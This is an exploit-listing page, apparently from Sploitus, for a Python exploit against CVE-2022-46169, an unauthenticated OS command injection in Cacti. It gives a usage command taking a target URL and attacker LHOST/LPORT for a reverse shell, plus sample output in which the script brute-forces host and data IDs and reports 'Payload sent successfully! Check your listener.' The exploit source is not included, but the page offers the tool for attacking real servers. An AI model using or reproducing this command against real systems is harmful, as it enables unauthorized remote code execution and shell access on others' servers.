Exploit for OS Command Injection in Cacti CVE-2022-46169

Name: Exploit for OS Command Injection in Cacti CVE-2022-46169
Rating: 5 (82 reviews)

2025-07-02 | CVSS 9.8

## https://sploitus.com/exploit?id=4028BE70-FEDD-5BC7-A353-54EEDB55EFA8
# CVE-2022-46169
This exploit is a modified version from the original script by @FredBrave and adapted by @arthurcortesr and @alv-david. 

## Usage/Examples

```python
python3 CVE-2022-46169.py -u http://XX.XX.XX.XX --LHOST XX.XX.XX.XX --LPORT XXXX --host-id X --local-id X
```
## Expected results
```
[*] Testing host_id=X, local_data_id=XX...
[+] Found working combination: host_id=X, local_data_id=X
[*] Payload sent successfully! Check your listener.
```
## Authors

- [@FredBrave](https://github.com/FredBrave)
- [@arthurcortesr](https://www.linkedin.com/in/arthurcortesr/)
- [@alv-david](https://www.linkedin.com/in/alv-david/)